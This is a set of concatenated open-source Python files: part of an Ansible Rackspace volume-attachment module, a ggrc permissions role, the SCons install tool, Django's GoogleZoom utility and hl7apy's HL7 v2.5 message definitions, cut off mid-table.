pyrax.utils.wait_until(volume, 'status', 'available',
interval=3, attempts=0,
verbose=False)
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
volume.get()
changed = True
elif volume.attachments:
module.fail_json(msg='Volume is attached to another server')
result = dict(changed=changed, volume=rax_to_dict(volume))
if volume.status == 'error':
result['msg'] = '%s failed to build' % volume.id
if 'msg' in result:
module.fail_json(**result)
else:
module.exit_json(**result)
module.exit_json(changed=changed, volume=instance)
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
device=dict(required=True),
volume=dict(required=True),
server=dict(required=True),
state=dict(default='present', choices=['present', 'absent']),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together()
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
device = module.params.get('device')
volume = module.params.get('volume')
server = module.params.get('server')
state = module.params.get('state')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
setup_rax_module(module, pyrax)
cloud_block_storage_attachments(module, state, volume, server, device,
wait, wait_timeout)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
### invoke the module
main()
|
AleksNeStu/ggrc-core
|
refs/heads/release/0.10-Raspberry
|
src/ggrc_basic_permissions/roles/ProgramOwner.py
|
7
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
scope = "Private Program"
description = """
User with authorization to perform administrative tasks such as associating
users to roles within the scope of a program.<br/><br/>When a person
creates a program, they are automatically given the ProgramOwner role. This
allows them to Edit, Delete, or Map objects to the Program. It also allows
them to add people and assign them roles when their programs are private.
ProgramOwner is the most powerful role.
"""
permissions = {
"read": [
"ObjectDocument",
"ObjectPerson",
"Program",
"ProgramControl",
"Relationship",
"UserRole",
"Context",
],
"create": [
"ObjectDocument",
"ObjectPerson",
"ProgramControl",
"Relationship",
"UserRole",
"Audit",
"Snapshot",
],
"view_object_page": [
"__GGRC_ALL__"
],
"update": [
"ObjectDocument",
"ObjectPerson",
"Program",
"ProgramControl",
"Relationship",
"UserRole"
],
"delete": [
"ObjectDocument",
"ObjectPerson",
"Program",
"ProgramControl",
"Relationship",
"UserRole",
]
}
|
NickShaffner/rhea
|
refs/heads/master
|
rhea/cores/usbext/__init__.py
|
2
|
from __future__ import absolute_import
from .fpgalink import fpgalink
from .fpgalink import fpgalink_fx2
#from usbp import m_usbp
|
tomhughes/mapnik
|
refs/heads/master
|
scons/scons-local-4.1.0/SCons/Tool/install.py
|
2
|
"""SCons.Tool.install
Tool-specific initialization for the install tool.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import os
from shutil import copy2, copymode, copystat
import SCons.Action
import SCons.Tool
from SCons.Tool.linkCommon import StringizeLibSymlinks, CreateLibSymlinks, EmitLibSymlinks
import SCons.Util
#
# We keep track of *all* installed files.
_INSTALLED_FILES = []
_UNIQUE_INSTALLED_FILES = None
class CopytreeError(OSError):
pass
def scons_copytree(src, dst, symlinks=False, ignore=None, copy_function=copy2,
ignore_dangling_symlinks=False, dirs_exist_ok=False):
"""Recursively copy a directory tree, SCons version.
This is a modified copy of the Python 3.7 shutil.copytree function.
SCons update: dirs_exist_ok dictates whether to raise an
exception in case dst or any missing parent directory already
exists. Implementation depends on os.makedirs having a similar
flag, which it has since Python 3.2. This version also raises an
SCons-defined exception rather than the one defined locally to shutil.
This version uses a change from Python 3.8.
TODO: we can remove this forked copy once the minimum Py version is 3.8.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed to by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
os.makedirs(dst, exist_ok=dirs_exist_ok)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if os.path.islink(srcname):
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
copystat(srcname, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
# otherwise let the copy occur; copy2 will raise an error
if os.path.isdir(srcname):
scons_copytree(srcname, dstname, symlinks, ignore,
copy_function, dirs_exist_ok)
else:
copy_function(srcname, dstname)
elif os.path.isdir(srcname):
scons_copytree(srcname, dstname, symlinks, ignore, copy_function, dirs_exist_ok)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except CopytreeError as err: # SCons change
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, 'winerror', None) is None:
errors.append((src, dst, str(why)))
if errors:
raise CopytreeError(errors) # SCons change
return dst
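# Illustrative call (hypothetical paths): copy a tree while tolerating an
# already-existing destination directory, as copyFunc() below does:
#
#   scons_copytree('build/docs', '/opt/pkg/share/doc', dirs_exist_ok=True)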
#
# Functions doing the actual work of the Install Builder.
#
def copyFunc(dest, source, env):
"""Install a source file or directory into a destination by copying,
Mode/permissions bits will be copied as well.
"""
if os.path.isdir(source):
if os.path.exists(dest):
if not os.path.isdir(dest):
raise SCons.Errors.UserError("cannot overwrite non-directory `%s' with a directory `%s'" % (str(dest), str(source)))
else:
parent = os.path.split(dest)[0]
if not os.path.exists(parent):
os.makedirs(parent)
scons_copytree(source, dest, dirs_exist_ok=True)
else:
copy2(source, dest)
copymode(source, dest)
return 0
#
# Functions doing the actual work of the InstallVersionedLib Builder.
#
def copyFuncVersionedLib(dest, source, env):
"""Install a versioned library into a destination by copying,
Mode/permissions bits will be copied as well.
Any required symbolic links for other library names are created.
"""
if os.path.isdir(source):
raise SCons.Errors.UserError("cannot install directory `%s' as a version library" % str(source) )
else:
# remove the link if it is already there
try:
os.remove(dest)
except:
pass
copy2(source, dest)
copymode(source, dest)
installShlibLinks(dest, source, env)
return 0
def listShlibLinksToInstall(dest, source, env):
install_links = []
source = env.arg2nodes(source)
dest = env.fs.File(dest)
install_dir = dest.get_dir()
for src in source:
symlinks = getattr(getattr(src, 'attributes', None), 'shliblinks', None)
if symlinks:
for link, linktgt in symlinks:
link_base = os.path.basename(link.get_path())
linktgt_base = os.path.basename(linktgt.get_path())
install_link = env.fs.File(link_base, install_dir)
install_linktgt = env.fs.File(linktgt_base, install_dir)
install_links.append((install_link, install_linktgt))
return install_links
def installShlibLinks(dest, source, env):
"""If we are installing a versioned shared library create the required links."""
Verbose = False
symlinks = listShlibLinksToInstall(dest, source, env)
if Verbose:
print('installShlibLinks: symlinks={!r}'.format(StringizeLibSymlinks(symlinks)))
if symlinks:
CreateLibSymlinks(env, symlinks)
return
def installFunc(target, source, env):
"""Install a source file into a target using the function specified
as the INSTALL construction variable."""
try:
install = env['INSTALL']
except KeyError:
raise SCons.Errors.UserError('Missing INSTALL construction variable.')
assert len(target)==len(source), \
"Installing source %s into target %s: target and source lists must have same length."%(list(map(str, source)), list(map(str, target)))
for t,s in zip(target,source):
if install(t.get_path(),s.get_path(),env):
return 1
return 0
def installFuncVersionedLib(target, source, env):
"""Install a versioned library into a target using the function specified
as the INSTALLVERSIONEDLIB construction variable."""
try:
install = env['INSTALLVERSIONEDLIB']
except KeyError:
raise SCons.Errors.UserError('Missing INSTALLVERSIONEDLIB construction variable.')
assert len(target)==len(source), \
"Installing source %s into target %s: target and source lists must have same length."%(list(map(str, source)), list(map(str, target)))
for t,s in zip(target,source):
if hasattr(t.attributes, 'shlibname'):
tpath = os.path.join(t.get_dir(), t.attributes.shlibname)
else:
tpath = t.get_path()
if install(tpath,s.get_path(),env):
return 1
return 0
def stringFunc(target, source, env):
installstr = env.get('INSTALLSTR')
if installstr:
return env.subst_target_source(installstr, 0, target, source)
target = str(target[0])
source = str(source[0])
if os.path.isdir(source):
type = 'directory'
else:
type = 'file'
return 'Install %s: "%s" as "%s"' % (type, source, target)
#
# Emitter functions
#
def add_targets_to_INSTALLED_FILES(target, source, env):
""" An emitter that adds all target files to the list stored in the
_INSTALLED_FILES global variable. This way all installed files of one
scons call will be collected.
"""
global _INSTALLED_FILES, _UNIQUE_INSTALLED_FILES
_INSTALLED_FILES.extend(target)
_UNIQUE_INSTALLED_FILES = None
return (target, source)
def add_versioned_targets_to_INSTALLED_FILES(target, source, env):
""" An emitter that adds all target files to the list stored in the
_INSTALLED_FILES global variable. This way all installed files of one
scons call will be collected.
"""
global _INSTALLED_FILES, _UNIQUE_INSTALLED_FILES
Verbose = False
_INSTALLED_FILES.extend(target)
if Verbose:
print("add_versioned_targets_to_INSTALLED_FILES: target={!r}".format(list(map(str, target))))
symlinks = listShlibLinksToInstall(target[0], source, env)
if symlinks:
EmitLibSymlinks(env, symlinks, target[0])
_UNIQUE_INSTALLED_FILES = None
return (target, source)
class DESTDIR_factory:
""" A node factory, where all files will be relative to the dir supplied
in the constructor.
"""
def __init__(self, env, dir):
self.env = env
self.dir = env.arg2nodes( dir, env.fs.Dir )[0]
def Entry(self, name):
name = SCons.Util.make_path_relative(name)
return self.dir.Entry(name)
def Dir(self, name):
name = SCons.Util.make_path_relative(name)
return self.dir.Dir(name)
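# Sketch of the effect (assumed paths): running `scons --install-sandbox=/tmp/stage`
# routes targets through DESTDIR_factory, so an install target such as
# /usr/local/bin/foo is re-rooted to /tmp/stage/usr/local/bin/foo, which is the
# usual staged-install (packaging) workflow.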
#
# The Builder Definition
#
install_action = SCons.Action.Action(installFunc, stringFunc)
installas_action = SCons.Action.Action(installFunc, stringFunc)
installVerLib_action = SCons.Action.Action(installFuncVersionedLib, stringFunc)
BaseInstallBuilder = None
def InstallBuilderWrapper(env, target=None, source=None, dir=None, **kw):
if target and dir:
import SCons.Errors
raise SCons.Errors.UserError("Both target and dir defined for Install(), only one may be defined.")
if not dir:
dir=target
import SCons.Script
install_sandbox = SCons.Script.GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
try:
dnodes = env.arg2nodes(dir, target_factory.Dir)
except TypeError:
raise SCons.Errors.UserError("Target `%s' of Install() is a file, but should be a directory. Perhaps you have the Install() arguments backwards?" % str(dir))
sources = env.arg2nodes(source, env.fs.Entry)
tgt = []
for dnode in dnodes:
for src in sources:
# Prepend './' so the lookup doesn't interpret an initial
# '#' on the file name portion as meaning the Node should
# be relative to the top-level SConstruct directory.
target = env.fs.Entry('.'+os.sep+src.name, dnode)
tgt.extend(BaseInstallBuilder(env, target, src, **kw))
return tgt
def InstallAsBuilderWrapper(env, target=None, source=None, **kw):
result = []
    for src, tgt in zip(source, target):
result.extend(BaseInstallBuilder(env, tgt, src, **kw))
return result
BaseVersionedInstallBuilder = None
def InstallVersionedBuilderWrapper(env, target=None, source=None, dir=None, **kw):
if target and dir:
import SCons.Errors
raise SCons.Errors.UserError("Both target and dir defined for Install(), only one may be defined.")
if not dir:
dir=target
import SCons.Script
install_sandbox = SCons.Script.GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
try:
dnodes = env.arg2nodes(dir, target_factory.Dir)
except TypeError:
raise SCons.Errors.UserError("Target `%s' of Install() is a file, but should be a directory. Perhaps you have the Install() arguments backwards?" % str(dir))
sources = env.arg2nodes(source, env.fs.Entry)
tgt = []
for dnode in dnodes:
for src in sources:
# Prepend './' so the lookup doesn't interpret an initial
# '#' on the file name portion as meaning the Node should
# be relative to the top-level SConstruct directory.
target = env.fs.Entry('.'+os.sep+src.name, dnode)
tgt.extend(BaseVersionedInstallBuilder(env, target, src, **kw))
return tgt
added = None
def generate(env):
from SCons.Script import AddOption, GetOption
global added
if not added:
added = 1
AddOption('--install-sandbox',
dest='install_sandbox',
type="string",
action="store",
help='A directory under which all installed files will be placed.')
global BaseInstallBuilder
if BaseInstallBuilder is None:
install_sandbox = GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
BaseInstallBuilder = SCons.Builder.Builder(
action = install_action,
target_factory = target_factory.Entry,
source_factory = env.fs.Entry,
multi = 1,
emitter = [ add_targets_to_INSTALLED_FILES, ],
source_scanner = SCons.Scanner.Base( {}, name = 'Install', recursive = False ),
name = 'InstallBuilder')
global BaseVersionedInstallBuilder
if BaseVersionedInstallBuilder is None:
install_sandbox = GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
BaseVersionedInstallBuilder = SCons.Builder.Builder(
action = installVerLib_action,
target_factory = target_factory.Entry,
source_factory = env.fs.Entry,
multi = 1,
emitter = [ add_versioned_targets_to_INSTALLED_FILES, ],
name = 'InstallVersionedBuilder')
env['BUILDERS']['_InternalInstall'] = InstallBuilderWrapper
env['BUILDERS']['_InternalInstallAs'] = InstallAsBuilderWrapper
env['BUILDERS']['_InternalInstallVersionedLib'] = InstallVersionedBuilderWrapper
# We'd like to initialize this doing something like the following,
# but there isn't yet support for a ${SOURCE.type} expansion that
# will print "file" or "directory" depending on what's being
# installed. For now we punt by not initializing it, and letting
# the stringFunc() that we put in the action fall back to the
# hand-crafted default string if it's not set.
#
#try:
# env['INSTALLSTR']
#except KeyError:
# env['INSTALLSTR'] = 'Install ${SOURCE.type}: "$SOURCES" as "$TARGETS"'
try:
env['INSTALL']
except KeyError:
env['INSTALL'] = copyFunc
try:
env['INSTALLVERSIONEDLIB']
except KeyError:
env['INSTALLVERSIONEDLIB'] = copyFuncVersionedLib
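# A minimal SConstruct-level sketch of what this tool enables (hypothetical
# file names; the builders registered above back the public Install()/
# InstallAs() environment methods):
#
#   env = Environment()
#   env.Install('/usr/local/bin', 'myprog')              # copy into a directory
#   env.InstallAs('/usr/local/bin/prog-1.0', 'myprog')   # copy under a new name
#   env.Alias('install', '/usr/local/bin')               # run with `scons install`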
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
mdj2/django
|
refs/heads/master
|
django/contrib/gis/maps/google/zoom.py
|
224
|
from django.contrib.gis.geos import GEOSGeometry, LinearRing, Polygon, Point
from django.contrib.gis.maps.google.gmap import GoogleMapException
from django.utils.six.moves import xrange
from math import pi, sin, log, exp, atan
# Constants used for degree to radian conversion, and vice-versa.
DTOR = pi / 180.
RTOD = 180. / pi
class GoogleZoom(object):
"""
GoogleZoom is a utility for performing operations related to the zoom
levels on Google Maps.
This class is inspired by the OpenStreetMap Mapnik tile generation routine
`generate_tiles.py`, and the article "How Big Is the World" (Hack #16) in
"Google Maps Hacks" by Rich Gibson and Schuyler Erle.
`generate_tiles.py` may be found at:
http://trac.openstreetmap.org/browser/applications/rendering/mapnik/generate_tiles.py
"Google Maps Hacks" may be found at http://safari.oreilly.com/0596101619
"""
def __init__(self, num_zoom=19, tilesize=256):
"Initializes the Google Zoom object."
        # Google's tilesize is 256x256; square tiles are assumed.
self._tilesize = tilesize
# The number of zoom levels
self._nzoom = num_zoom
# Initializing arrays to hold the parameters for each one of the
# zoom levels.
self._degpp = [] # Degrees per pixel
self._radpp = [] # Radians per pixel
self._npix = [] # 1/2 the number of pixels for a tile at the given zoom level
# Incrementing through the zoom levels and populating the parameter arrays.
z = tilesize # The number of pixels per zoom level.
for i in xrange(num_zoom):
            # Getting the degrees and radians per pixel, and 1/2 the number of
            # pixels for every zoom level.
self._degpp.append(z / 360.) # degrees per pixel
self._radpp.append(z / (2 * pi)) # radians per pixel
self._npix.append(z / 2) # number of pixels to center of tile
# Multiplying `z` by 2 for the next iteration.
z *= 2
def __len__(self):
"Returns the number of zoom levels."
return self._nzoom
def get_lon_lat(self, lonlat):
"Unpacks longitude, latitude from GEOS Points and 2-tuples."
if isinstance(lonlat, Point):
lon, lat = lonlat.coords
else:
lon, lat = lonlat
return lon, lat
def lonlat_to_pixel(self, lonlat, zoom):
"Converts a longitude, latitude coordinate pair for the given zoom level."
# Setting up, unpacking the longitude, latitude values and getting the
# number of pixels for the given zoom level.
lon, lat = self.get_lon_lat(lonlat)
npix = self._npix[zoom]
        # Calculating the pixel x coordinate by multiplying the longitude value
        # by the number of degrees/pixel at the given zoom level.
px_x = round(npix + (lon * self._degpp[zoom]))
# Creating the factor, and ensuring that 1 or -1 is not passed in as the
# base to the logarithm. Here's why:
# if fac = -1, we'll get log(0) which is undefined;
# if fac = 1, our logarithm base will be divided by 0, also undefined.
fac = min(max(sin(DTOR * lat), -0.9999), 0.9999)
# Calculating the pixel y coordinate.
px_y = round(npix + (0.5 * log((1 + fac)/(1 - fac)) * (-1.0 * self._radpp[zoom])))
# Returning the pixel x, y to the caller of the function.
return (px_x, px_y)
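        # Sanity check (assuming the default 256-pixel tiles): at zoom 0,
        # npix is 128 and both offsets above are zero for (0, 0), so
        # lonlat_to_pixel((0, 0), 0) lands on the center pixel (128, 128);
        # px_y grows toward the south because of the -1.0 factor.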
def pixel_to_lonlat(self, px, zoom):
"Converts a pixel to a longitude, latitude pair at the given zoom level."
if len(px) != 2:
raise TypeError('Pixel should be a sequence of two elements.')
# Getting the number of pixels for the given zoom level.
npix = self._npix[zoom]
# Calculating the longitude value, using the degrees per pixel.
lon = (px[0] - npix) / self._degpp[zoom]
# Calculating the latitude value.
lat = RTOD * ( 2 * atan(exp((px[1] - npix)/ (-1.0 * self._radpp[zoom]))) - 0.5 * pi)
# Returning the longitude, latitude coordinate pair.
return (lon, lat)
def tile(self, lonlat, zoom):
"""
Returns a Polygon corresponding to the region represented by a fictional
Google Tile for the given longitude/latitude pair and zoom level. This
tile is used to determine the size of a tile at the given point.
"""
# The given lonlat is the center of the tile.
delta = self._tilesize / 2
# Getting the pixel coordinates corresponding to the
        # longitude/latitude.
px = self.lonlat_to_pixel(lonlat, zoom)
# Getting the lower-left and upper-right lat/lon coordinates
# for the bounding box of the tile.
ll = self.pixel_to_lonlat((px[0]-delta, px[1]-delta), zoom)
ur = self.pixel_to_lonlat((px[0]+delta, px[1]+delta), zoom)
# Constructing the Polygon, representing the tile and returning.
return Polygon(LinearRing(ll, (ll[0], ur[1]), ur, (ur[0], ll[1]), ll), srid=4326)
def get_zoom(self, geom):
"Returns the optimal Zoom level for the given geometry."
# Checking the input type.
if not isinstance(geom, GEOSGeometry) or geom.srid != 4326:
raise TypeError('get_zoom() expects a GEOS Geometry with an SRID of 4326.')
# Getting the envelope for the geometry, and its associated width, height
# and centroid.
env = geom.envelope
env_w, env_h = self.get_width_height(env.extent)
center = env.centroid
for z in xrange(self._nzoom):
# Getting the tile at the zoom level.
tile_w, tile_h = self.get_width_height(self.tile(center, z).extent)
            # When the geometry spans more than one tile, the previous zoom
            # level was the closest fit.
if (env_w > tile_w) or (env_h > tile_h):
if z == 0:
raise GoogleMapException('Geometry width and height should not exceed that of the Earth.')
return z-1
# Otherwise, we've zoomed in to the max.
return self._nzoom-1
def get_width_height(self, extent):
"""
Returns the width and height for the given extent.
"""
# Getting the lower-left, upper-left, and upper-right
# coordinates from the extent.
ll = Point(extent[:2])
ul = Point(extent[0], extent[3])
ur = Point(extent[2:])
# Calculating the width and height.
height = ll.distance(ul)
width = ul.distance(ur)
return width, height
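# A minimal usage sketch (hypothetical bounding box; requires GEOS support):
#
#   from django.contrib.gis.geos import Polygon
#   zoom = GoogleZoom()
#   area = Polygon.from_bbox((-6.4, 49.9, 1.8, 55.8))   # rough Great Britain extent
#   area.srid = 4326
#   level = zoom.get_zoom(area)                          # best-fit zoom level
#   px = zoom.lonlat_to_pixel((-0.13, 51.51), level)     # central London in pixels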
|
crs4/hl7apy
|
refs/heads/develop
|
hl7apy/v2_5/messages.py
|
1
|
from .groups import GROUPS
from .segments import SEGMENTS
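# Each entry maps an HL7 v2.5 message structure ID (e.g. 'ADT_A01') to a
# ('sequence', children) tuple. Every child is a 4-tuple of
# (name, definition, (min, max), kind), where kind is 'SEG' for a segment or
# 'GRP' for a group and max == -1 means the element may repeat without bound.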
MESSAGES = {
'ACK': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),)),
'ADR_A19': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('ADR_A19_QUERY_RESPONSE', GROUPS['ADR_A19_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ADT_A01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A01_PROCEDURE', GROUPS['ADT_A01_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A01_INSURANCE', GROUPS['ADT_A01_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('UB1', SEGMENTS['UB1'], (0, 1), 'SEG'),
('UB2', SEGMENTS['UB2'], (0, 1), 'SEG'),
('PDA', SEGMENTS['PDA'], (0, 1), 'SEG'),)),
'ADT_A02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('PDA', SEGMENTS['PDA'], (0, 1), 'SEG'),)),
'ADT_A03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A03_PROCEDURE', GROUPS['ADT_A03_PROCEDURE'], (0, -1), 'GRP'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A03_INSURANCE', GROUPS['ADT_A03_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('PDA', SEGMENTS['PDA'], (0, 1), 'SEG'),)),
'ADT_A05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A05_PROCEDURE', GROUPS['ADT_A05_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A05_INSURANCE', GROUPS['ADT_A05_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('UB1', SEGMENTS['UB1'], (0, 1), 'SEG'),
('UB2', SEGMENTS['UB2'], (0, 1), 'SEG'),)),
'ADT_A06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('MRG', SEGMENTS['MRG'], (0, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A06_PROCEDURE', GROUPS['ADT_A06_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A06_INSURANCE', GROUPS['ADT_A06_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('UB1', SEGMENTS['UB1'], (0, 1), 'SEG'),
('UB2', SEGMENTS['UB2'], (0, 1), 'SEG'),)),
'ADT_A09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
